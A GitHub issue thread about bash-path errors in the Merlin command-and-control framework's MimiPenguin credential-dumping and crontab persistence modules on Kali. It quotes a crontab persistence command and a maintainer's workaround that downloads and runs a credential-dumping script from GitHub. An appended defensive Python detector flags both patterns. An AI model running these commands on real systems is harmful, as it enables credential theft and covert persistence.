MimiPenguin & BASH Path Error #114

Open
3 tasks done
P-T001 opened this issue Aug 9, 2021 · 4 comments
P-T001 commented Aug 9, 2021

Hi there,
I looked for several post-c2 development frameworks. Finally, I thought Merlin was better and easy to install, but now I have a problem. I casually tested several modules and each time it was "not found" and "exit status code 127". But I can use the echoed command directly.

Error:

    [-] Results job lkqFILVvZK for agent f8eb12ec-3fef-4f17-8763-c230x7a791aa at 2021-08-09T08:51:18Z

    [+] /bin/sh: 1: (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c") | crontab - && echo crontab successfully modified.: not found

    [!] exit status 127

Prerequisite

  • I have read the README
  • I have searched the opened & closed issues
  • I have searched the WIKI and its FAQ page

Environment Data

  • Merlin Version:
  • Merlin Build:
  • Go Version: go1.15.9 linux/amd64
  • GOPATH Environment Variable:
  • GOROOT Environment Variable:
  • Operating System: kali-linux-2020.2-amd64

Ne0nd0g commented Aug 9, 2021

Can you please share the following information:

  • A list of module names that were not found
  • A list of module names that returned an error
  • The Merlin Server version and build
  • The Merlin Agent version, build, and operating system


P-T001 commented Aug 10, 2021

The following information:

  • A list of module names that were not found:
    I don't understand what you mean.
  • A list of module names that returned an error: (I tested that both modules reported the above 127 errors)
    linux/x64/bash/credentials/MimiPenguin
    linux/x64/bash/persistence/CrontabPersistence
  • The Merlin Server version and build:
    Version: 1.1.0 system: kali-linux-2020.2-amd64, go1.15.9 linux/amd64
  • The Merlin Agent version, build, and operating system:
    Version: 1.0.2 system: kali-linux-2020.2-amd64, go1.15.9 linux/amd64


Ne0nd0g commented Aug 10, 2021

You said:

> I casually tested several modules and each time it was "not found"

What modules did you test that were "not found"?


The problem is that the module is for BASH but Kali uses the Debian Almquist shell (dash). The symbolic link for /bin/sh on Kali points to /usr/bin/dash. The modules are causing an error because they are using /bin/bash, which does not exist on Kali.

A temporary workaround is to replace the commands list with:

    "commands": [
      "/bin/sh", "-c", "wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh;bash /tmp/mimipenguin.sh && rm /tmp/mimipenguin.sh"
    ]

I will work on fixing the code.
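
For defenders, the two command shapes that appear in this thread (a download to a temporary path that is then run and deleted, and `crontab -l` output piped back into `crontab -`) can be flagged in command-line logs. The following is an added example, not part of the thread and not Merlin project code; it assumes the input is the shell command string as recorded by process logging, and the function names, tag names and sample strings are hypothetical or constructed.

```python
import re
import shlex

SHELLS = {"sh", "bash", "dash", "zsh"}
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\|)\s*")  # statement separators, not pipes
CRON_REWRITE = re.compile(r"\bcrontab\s+-l\b.*\|\s*crontab\s+-(?=\s|$)")  # in-place rewrite

def words(stmt):
    """Tokenise one statement; unbalanced quotes yield no tokens."""
    try:
        return shlex.split(stmt)
    except ValueError:
        return []

def base(path):
    return path.rsplit("/", 1)[-1]

def download_target(argv):
    """Output path of `wget -O <path>` or `curl -o <path>`, else None."""
    flag = {"wget": "-O", "curl": "-o"}.get(base(argv[0])) if argv else None
    if flag and flag in argv[1:-1]:
        return argv[argv.index(flag) + 1]
    return None

def classify(cmdline):
    """Return heuristic tags (hypothetical names) for one shell command string."""
    tags = ["crontab-rewrite"] if CRON_REWRITE.search(cmdline) else []
    stmts = [words(s) for s in SEPARATORS.split(cmdline)]
    for i, argv in enumerate(stmts):
        path = download_target(argv)
        rest = [a for a in stmts[i + 1:] if a]  # statements after the download
        ran = any(a[0] == path or (base(a[0]) in SHELLS and path in a[1:]) for a in rest)
        removed = any(base(a[0]) == "rm" and path in a[1:] for a in rest)
        if path and ran and removed:
            tags.append("download-exec-delete")
            break
    return tags

# Constructed sample command strings (host and file names are placeholders).
SAMPLES = [
    "wget -O /tmp/stage.sh https://example.invalid/stage.sh;bash /tmp/stage.sh && rm /tmp/stage.sh",
    '(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c") | crontab - && echo done',
    "wget -O /tmp/report.pdf https://example.invalid/report.pdf",
    "crontab -l",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample), sample)
```

The heuristic only tags a download when the same path is later executed and removed, so a plain file download or a read-only `crontab -l` produces no tag.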


P-T001 commented Aug 11, 2021

"Not found" refers to the error message in error code 127. It is not that the module cannot be found. I think it should be the problem you said: the use of "/bin/bash", which does not exist on Kali.

Ne0nd0g changed the title from "Module usage error code 127" to "MimiPenguin & BASH Path Error" on Nov 9, 2023